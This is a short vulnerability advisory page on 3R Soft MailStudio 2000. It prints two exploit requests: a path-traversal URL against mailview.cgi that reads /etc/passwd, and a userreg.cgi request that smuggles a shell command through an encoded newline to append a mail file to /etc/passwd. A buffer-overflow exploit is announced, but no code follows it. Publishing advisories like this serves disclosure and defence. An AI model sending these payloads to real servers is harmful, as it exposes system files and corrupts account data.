3R Soft MailStudio 2000 Multiple Vulnerabilities

s0ftpr0ject <http://www.s0ftpj.org> has provided the following exploits:

Mail view vulnerability:
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd

userreg.cgi vulnerability:
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd


Fyodor <fygrave@tigerteam.net> has provided the following exploit for the buffer overflow:


 

Privacy Statement
Copyright 2010, SecurityFocus